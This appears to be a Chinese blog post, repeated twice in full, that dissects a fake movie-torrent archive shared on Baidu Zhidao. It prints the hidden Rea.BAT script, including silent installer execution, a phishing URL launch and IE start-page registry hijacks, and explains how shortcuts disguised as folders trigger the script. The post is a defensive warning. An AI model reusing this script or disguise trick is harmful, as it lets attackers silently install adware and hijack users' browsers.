作者:羊羔助手
最新上映的电影《私人订制》倍受瞩目,不少网友都迫不及待地等待着抢先版的BT种子下载链接。而且最近“百度知道”的升级也给网友们搜索各种资源提供了不少方便,那就是热心网友在回答问题时可以在“百度知道”的网页内提供求助网友想要的资源,这些下载资源均来自解答网友的“百度网盘”。
[要查看本图请先注册并登录]
既然热心网友们提供的这些《私人订制》的BT都已经通过了“百度”安全检测,那咱也下载一个来看看。
[要查看本图请先注册并登录]
在《迅雷》中可以看到,通过《百度网盘》下载的资源文件竟然不是BT种子文件“*.torrent”,而是一个名为“私人订制BT种子.rar”的压缩包文件。BT种子也只不过是一个含有下载信息和相关文件信息的文本文件,撑死不过几百KB大小,可是下载下来的这个RAR压缩包的文件大小竟然是“9.14 MB”。文件如此之大,肯定是还装了别的什么东西,那么我就倒要看看里面装得到底是什么。
[要查看本图请先注册并登录]
解压“私人订制BT种子.rar”后,会释放出名为“亲要的资源”、“神器”、“使用说明”、“种子修复器_”、“注意:请把全部文件解压后在使用,否则有错误”的几个文件夹。这5个文件夹的文件大小都是“2.12 KB”,合起来算才“10.6 KB”,那么剩下的那“9000”多KB哪去了呢?
[要查看本图请先注册并登录]
先不管这几个文件夹有没有那个快捷方式的小箭头;经过测试,在“Windows 7”系统下这几个文件夹图标显示正常,但是在“Windows XP”系统下这些文件夹的图标分辨率就会变得很低。所以有点儿电脑经验的人凭这一点儿就能看出它们不是文件夹,而是伪装成文件夹的快捷方式。这是因为作者在给这些快捷方式设置图标的时候是在“Windows 7”系统下进行的,由于“Windows 7”系统视窗外壳文件“SHELL32.dll”的图标排列和“Windows XP”系统视窗外壳文件“SHELL32.dll”的图标排列不一样,故而也就造成了文件图标的显示漏洞,让人一眼就能看出来这些文件图标是有人早已故意设置好的。
[要查看本图请先注册并登录]
这些快捷方式的目标位置是“system32”,指向“%windir%\system32\cmd.exe”。注意微软命令提示符程序“cmd.exe”的命令参数“cmd.exe /c??start temp\Rea.BAT”,根据“Windows”的运行规则,在“start”命令后面缺省路径的情况下则是执行当前目录下的同名文件。那么这段命令的作用就是用“cmd.exe”执行当前目录下的文件夹“temp”文件夹下面的文件“Rea.BAT”,执行后终止“cmd.exe”自身。
可是解压缩后的目录内除了这五个快捷方式之外,根本找不到它们指定的那个文件夹“temp”。看来这个“temp”绝对是个隐藏文件,而且解压目录余下的那“9000”多KB的内容肯定就在这个“temp”文件夹内。
[要查看本图请先注册并登录]
“文件夹选项”——“隐藏文件和文件夹”下选定“显示隐藏的文件、文件夹和驱动器”后,确定。随后,一个名为“temp”的隐藏文件夹果然展现了出来。
[要查看本图请先注册并登录]
进入隐藏文件夹“temp”,可以看到快捷方式指定的那个批处理文件“Rea.BAT”和另外4款应用软件的安装程序。
[要查看本图请先注册并登录]
“arfiei_70027.exe”、“nmeevfx_30437.exe”、“Setup[117]-rl.exe”、“setup_3106-1116.exe”这4个安装程序分别是《百度卫士》、《百度杀毒》、《天天桌面日历》、《音乐FM》的安装包。这些安装程序如果不小心被运行后,根本不会弹出任何安装界面,而是直接将自身解压释放到电脑中,它们均属于在系统后台静默安装的软件安装包。
[要查看本图请先注册并登录]
批处理文件“Rea.BAT”被夹在了这四款应用软件安装包的中间,鼠标右键在其菜单栏中选择“编辑”选项,来查看“Reg.BAT”里面的批处理命令。
[要查看本图请先注册并登录]
下面是对批处理文件“Rea.BAT”中的DOS命令分析。
@echo off???“Rea.BAT”被执行后在命令提示符的黑色窗口中不显示命令和参数。
start iexplore.exe?http://fuhaowang.net/?20131227??打开《Internet Explorer》连接《符号网》。
for /f "delims=" %%a in ('dir/a-d /b "*.exe"') do (start "" "%%~a")???执行“Rea.BAT”所在目录下的所有EXE程序。
reg add"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v"Start Page" /t reg_sz /d "http ://www.duba.com/?un_426198_1116"/f >nul 2>nul???将当前用户的IE主页篡改为《毒霸网址大全》。
reg add"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v"Default_Page_URL" /t reg_sz /d"http ://www.duba.com/?un_426198_1116" /f >nul 2>nul???将当前用户的IE默认页篡改为《毒霸网址大全》。
Exit???退出命令提示符窗口。
我分析到这一步之后,相信大家对“私人制定BT种子.rar”内的全部文件都有所了解了吧。因为从“百度知道”下载下来的这个资源文件根本就不是电影《私人制定》的BT种子文件,而是一个安装各种流氓软件和篡改IE主页的恶意程序。
[要查看本图请先注册并登录]
如果有谁上当点击了那五个伪装文件夹的快捷方式中的任何一个快捷方式,之后的情景则是一个黑色的命令提示符窗口一闪而过,紧接着会弹出一个名为《符号网》的钓鱼网站,经查明,该网站内的大部分信息都是虚假信息。过不了多久《百度卫士》、《百度杀毒》、《天天桌面日历》、《音乐FM》这四款流氓软件就会被悄无声息的安装到电脑之中,而且IE主页还被篡改成了《毒霸网址大全》,即使点击“使用默认值(F)”后也无济于事。
[要查看本图请先注册并登录]
其中被安装在电脑中的《天天桌面日历》最为流氓,可以说就是披着桌面日历工具的皮肤在用户电脑中肆意做广告的流氓软件。
[要查看本图请先注册并登录]
《天天桌面日历》开机会自动启动,进入系统后会开启三个进程。以大型广告弹窗为首的进程“TTnews.exe”首先会大量占用系统资源弹出“天天迷你版”。
[要查看本图请先注册并登录]
之后另外两个进程“TTtip.exe”和“TTCalendarForm.exe”会互相作用在桌面右下角不断弹出各种小型流氓广告窗口,可以说是非常频繁!
[要查看本图请先注册并登录]
《天天桌面日历》所弹出来的这些小广告大部分都与“百度推广”有关,因为部分广告弹窗的右下角都带有“百度推广”的标志。
而且“百度推广”的这些小广告还并不像一些淘宝广告弹窗那样宣传得货真价实,它所弹出来的广告大多为游戏、色情、卖假药等骗人骗财的虚假广告。其中“百度杀毒-文件监控”的那个广告弹窗最为搞笑了,开机后没多久就只听音箱发出一声女音:“发现病毒”……在电脑根本没有安装《百度杀毒》的情况下竟然还能发现电脑中存在恶意木马,难道伪造虚假弹窗恐吓用户去下载自身的《百度杀毒》它自己不就是个大木马吗?正规的绿色软件最起码不会靠着恫吓用户、欺骗用户来推广自己吧,所以这一招也就是能骗一骗无知的电脑小白。
[要查看本图请先注册并登录]
此为“百度杀毒-文件监控”虚假弹窗的地址链接:http :// pop.mebi9t.com:33/svr/richfra.aspx?pdir=EB4052B954C9F547F958E1BADF0E5CBA-10516-16828-2014%2f1%2f25+21%3a22%3a37-111.225.243.121&bqnu=16828&cpsc=undefined-undefined-Coo:true&plys=0&refr=&lohr=http%3A%2F%2Fwww.langrengan.com%2Fhtml%2Farticle%2Findex101202.html&scht=889&scwt=1920&wist=&fisz=0&ficd=0&fimd=0&hilt=2&dccr=GBK&naja=true&tmzo=8&plgn=-&mimen=33&srlt=8&srtp=8&psrh=0
此为“百度杀毒-文件监控”虚假弹窗的Flash地址:http :// js.mosa86.com/staff/go_1.swf
《天天桌面日历》的开发公司和“百度”公司到底存在着怎样的利益关系?能让它们如此猖狂的在用户电脑上为“百度推广”做广告?总之“百度”为了骗钱赚钱靠着这种下三滥的手法打着维护用户电脑安全的旗号推广自己的安全产品《百度杀毒》就不怕适得其反,引起公愤,臭名了自己的软件吗?
[要查看本图请先注册并登录]
《百度卫士》和《百度杀毒》等流氓软件在“百度知道”中伪装成《私人订制》的BT种子资源欺骗网民下载只是一个小例子。经多次下载证实,“百度知道”中提供的下载资源80%为虚假资源,甚至还会有病毒木马和流氓软件以及各种流氓网站URL链接。这些虚假资源除了会伪装成电影BT种子文件之外,还会以游戏外挂、小工具等多种诱人的网络资源的名义诱惑网民们下载,其手段各种各样,极不要脸,最容易受害的就是电脑新手了……当然大部分下载资源还是安全的,因为这些虚假资源多为《百度卫士》和《百度杀毒》还有《金山毒霸》的安装。安装它们后不但电脑安全不会受到威胁,相反还会给电脑的日常使用提供额外的安全。
[要查看本图请先注册并登录]
这是一个经常在“百度知道”中提供下载资源的一个“百度”用户,本次“私人订制BT种子.rar”就是在他的回答楼层中下载的。在他的“百度网盘”里面,大部分下载资源都是以各种色情视频BT种子在推广《百度卫士》和《百度杀毒》等流氓软件。像他这种在“百度知道”中恶意推广“百度”系列软件的“百度”用户还有很多,真不知他们是“百度”的托还是“百度”的忠实粉丝。不过话说回来,能写出那么有编程水平的批处理文件的用户应该不是很多吧。
[要查看本图请先注册并登录]
《百度卫士》和《百度杀毒》作为两款查杀病毒、查杀木马的安全软件,竟然和其它流氓软件混在一起似病毒木马的传播方式一样诱骗网民们下载安装。“百度”仗着自己搜索渠道的优势强行推广自己的软件,经常使用户在浑然不知的情况下就将《百度卫士》和《百度杀毒》安装到其电脑中去。不管“百度”这么做的目的是什么,总之“百度”在官方上对广大用户的承诺去了哪里?
[要查看本图请先注册并登录]
网友“羊羔助手”
最新上映的电影《私人订制》倍受瞩目,不少网友都迫不及待地等待着抢先版的BT种子下载链接。而且最近“百度知道”的升级也给网友们搜索各种资源提供了不少方便,那就是热心网友在回答问题时可以在“百度知道”的网页内提供求助网友想要的资源,这些下载资源均来自解答网友的“百度网盘”。
[要查看本图请先注册并登录]
既然热心网友们提供的这些《私人订制》的BT都已经通过了“百度”安全检测,那咱也下载一个来看看。
[要查看本图请先注册并登录]
在《迅雷》中可以看到,通过《百度网盘》下载的资源文件竟然不是BT种子文件“*.torrent”,而是一个名为“私人订制BT种子.rar”的压缩包文件。BT种子也只不过是一个含有下载信息和相关文件信息的文本文件,撑死不过几百KB大小,可是下载下来的这个RAR压缩包的文件大小竟然是“9.14 MB”。文件如此之大,肯定是还装了别的什么东西,那么我就倒要看看里面装得到底是什么。
[要查看本图请先注册并登录]
解压“私人订制BT种子.rar”后,会释放出名为“亲要的资源”、“神器”、“使用说明”、“种子修复器_”、“注意:请把全部文件解压后在使用,否则有错误”的几个文件夹。这5个文件夹的文件大小都是“2.12 KB”,合起来算才“10.6 KB”,那么剩下的那“9000”多KB哪去了呢?
[要查看本图请先注册并登录]
先不管这几个文件夹有没有那个快捷方式的小箭头;经过测试,在“Windows 7”系统下这几个文件夹图标显示正常,但是在“Windows XP”系统下这些文件夹的图标分辨率就会变得很低。所以有点儿电脑经验的人凭这一点儿就能看出它们不是文件夹,而是伪装成文件夹的快捷方式。这是因为作者在给这些快捷方式设置图标的时候是在“Windows 7”系统下进行的,由于“Windows 7”系统视窗外壳文件“SHELL32.dll”的图标排列和“Windows XP”系统视窗外壳文件“SHELL32.dll”的图标排列不一样,故而也就造成了文件图标的显示漏洞,让人一眼就能看出来这些文件图标是有人早已故意设置好的。
[要查看本图请先注册并登录]
这些快捷方式的目标位置是“system32”,指向“%windir%\system32\cmd.exe”。注意微软命令提示符程序“cmd.exe”的命令参数“cmd.exe /c??start temp\Rea.BAT”,根据“Windows”的运行规则,在“start”命令后面缺省路径的情况下则是执行当前目录下的同名文件。那么这段命令的作用就是用“cmd.exe”执行当前目录下的文件夹“temp”文件夹下面的文件“Rea.BAT”,执行后终止“cmd.exe”自身。
可是解压缩后的目录内除了这五个快捷方式之外,根本找不到它们指定的那个文件夹“temp”。看来这个“temp”绝对是个隐藏文件,而且解压目录余下的那“9000”多KB的内容肯定就在这个“temp”文件夹内。
[要查看本图请先注册并登录]
“文件夹选项”——“隐藏文件和文件夹”下选定“显示隐藏的文件、文件夹和驱动器”后,确定。随后,一个名为“temp”的隐藏文件夹果然展现了出来。
[要查看本图请先注册并登录]
进入隐藏文件夹“temp”,可以看到快捷方式指定的那个批处理文件“Rea.BAT”和另外4款应用软件的安装程序。
[要查看本图请先注册并登录]
“arfiei_70027.exe”、“nmeevfx_30437.exe”、“Setup[117]-rl.exe”、“setup_3106-1116.exe”这4个安装程序分别是《百度卫士》、《百度杀毒》、《天天桌面日历》、《音乐FM》的安装包。这些安装程序如果不小心被运行后,根本不会弹出任何安装界面,而是直接将自身解压释放到电脑中,它们均属于在系统后台静默安装的软件安装包。
[要查看本图请先注册并登录]
批处理文件“Rea.BAT”被夹在了这四款应用软件安装包的中间,鼠标右键在其菜单栏中选择“编辑”选项,来查看“Reg.BAT”里面的批处理命令。
[要查看本图请先注册并登录]
下面是对批处理文件“Rea.BAT”中的DOS命令分析。
@echo off???“Rea.BAT”被执行后在命令提示符的黑色窗口中不显示命令和参数。
start iexplore.exe?http://fuhaowang.net/?20131227??打开《Internet Explorer》连接《符号网》。
for /f "delims=" %%a in ('dir/a-d /b "*.exe"') do (start "" "%%~a")???执行“Rea.BAT”所在目录下的所有EXE程序。
reg add"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v"Start Page" /t reg_sz /d "http ://www.duba.com/?un_426198_1116"/f >nul 2>nul???将当前用户的IE主页篡改为《毒霸网址大全》。
reg add"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v"Default_Page_URL" /t reg_sz /d"http ://www.duba.com/?un_426198_1116" /f >nul 2>nul???将当前用户的IE默认页篡改为《毒霸网址大全》。
Exit???退出命令提示符窗口。
我分析到这一步之后,相信大家对“私人制定BT种子.rar”内的全部文件都有所了解了吧。因为从“百度知道”下载下来的这个资源文件根本就不是电影《私人制定》的BT种子文件,而是一个安装各种流氓软件和篡改IE主页的恶意程序。
[要查看本图请先注册并登录]
如果有谁上当点击了那五个伪装文件夹的快捷方式中的任何一个快捷方式,之后的情景则是一个黑色的命令提示符窗口一闪而过,紧接着会弹出一个名为《符号网》的钓鱼网站,经查明,该网站内的大部分信息都是虚假信息。过不了多久《百度卫士》、《百度杀毒》、《天天桌面日历》、《音乐FM》这四款流氓软件就会被悄无声息的安装到电脑之中,而且IE主页还被篡改成了《毒霸网址大全》,即使点击“使用默认值(F)”后也无济于事。
[要查看本图请先注册并登录]
其中被安装在电脑中的《天天桌面日历》最为流氓,可以说就是披着桌面日历工具的皮肤在用户电脑中肆意做广告的流氓软件。
[要查看本图请先注册并登录]
《天天桌面日历》开机会自动启动,进入系统后会开启三个进程。以大型广告弹窗为首的进程“TTnews.exe”首先会大量占用系统资源弹出“天天迷你版”。
[要查看本图请先注册并登录]
之后另外两个进程“TTtip.exe”和“TTCalendarForm.exe”会互相作用在桌面右下角不断弹出各种小型流氓广告窗口,可以说是非常频繁!
[要查看本图请先注册并登录]
《天天桌面日历》所弹出来的这些小广告大部分都与“百度推广”有关,因为部分广告弹窗的右下角都带有“百度推广”的标志。
而且“百度推广”的这些小广告还并不像一些淘宝广告弹窗那样宣传得货真价实,它所弹出来的广告大多为游戏、色情、卖假药等骗人骗财的虚假广告。其中“百度杀毒-文件监控”的那个广告弹窗最为搞笑了,开机后没多久就只听音箱发出一声女音:“发现病毒”……在电脑根本没有安装《百度杀毒》的情况下竟然还能发现电脑中存在恶意木马,难道伪造虚假弹窗恐吓用户去下载自身的《百度杀毒》它自己不就是个大木马吗?正规的绿色软件最起码不会靠着恫吓用户、欺骗用户来推广自己吧,所以这一招也就是能骗一骗无知的电脑小白。
[要查看本图请先注册并登录]
此为“百度杀毒-文件监控”虚假弹窗的地址链接:http :// pop.mebi9t.com:33/svr/richfra.aspx?pdir=EB4052B954C9F547F958E1BADF0E5CBA-10516-16828-2014%2f1%2f25+21%3a22%3a37-111.225.243.121&bqnu=16828&cpsc=undefined-undefined-Coo:true&plys=0&refr=&lohr=http%3A%2F%2Fwww.langrengan.com%2Fhtml%2Farticle%2Findex101202.html&scht=889&scwt=1920&wist=&fisz=0&ficd=0&fimd=0&hilt=2&dccr=GBK&naja=true&tmzo=8&plgn=-&mimen=33&srlt=8&srtp=8&psrh=0
此为“百度杀毒-文件监控”虚假弹窗的Flash地址:http :// js.mosa86.com/staff/go_1.swf
《天天桌面日历》的开发公司和“百度”公司到底存在着怎样的利益关系?能让它们如此猖狂的在用户电脑上为“百度推广”做广告?总之“百度”为了骗钱赚钱靠着这种下三滥的手法打着维护用户电脑安全的旗号推广自己的安全产品《百度杀毒》就不怕适得其反,引起公愤,臭名了自己的软件吗?
[要查看本图请先注册并登录]
《百度卫士》和《百度杀毒》等流氓软件在“百度知道”中伪装成《私人订制》的BT种子资源欺骗网民下载只是一个小例子。经多次下载证实,“百度知道”中提供的下载资源80%为虚假资源,甚至还会有病毒木马和流氓软件以及各种流氓网站URL链接。这些虚假资源除了会伪装成电影BT种子文件之外,还会以游戏外挂、小工具等多种诱人的网络资源的名义诱惑网民们下载,其手段各种各样,极不要脸,最容易受害的就是电脑新手了……当然大部分下载资源还是安全的,因为这些虚假资源多为《百度卫士》和《百度杀毒》还有《金山毒霸》的安装。安装它们后不但电脑安全不会受到威胁,相反还会给电脑的日常使用提供额外的安全。
[要查看本图请先注册并登录]
这是一个经常在“百度知道”中提供下载资源的一个“百度”用户,本次“私人订制BT种子.rar”就是在他的回答楼层中下载的。在他的“百度网盘”里面,大部分下载资源都是以各种色情视频BT种子在推广《百度卫士》和《百度杀毒》等流氓软件。像他这种在“百度知道”中恶意推广“百度”系列软件的“百度”用户还有很多,真不知他们是“百度”的托还是“百度”的忠实粉丝。不过话说回来,能写出那么有编程水平的批处理文件的用户应该不是很多吧。
[要查看本图请先注册并登录]
《百度卫士》和《百度杀毒》作为两款查杀病毒、查杀木马的安全软件,竟然和其它流氓软件混在一起似病毒木马的传播方式一样诱骗网民们下载安装。“百度”仗着自己搜索渠道的优势强行推广自己的软件,经常使用户在浑然不知的情况下就将《百度卫士》和《百度杀毒》安装到其电脑中去。不管“百度”这么做的目的是什么,总之“百度”在官方上对广大用户的承诺去了哪里?
[要查看本图请先注册并登录]
网友“羊羔助手”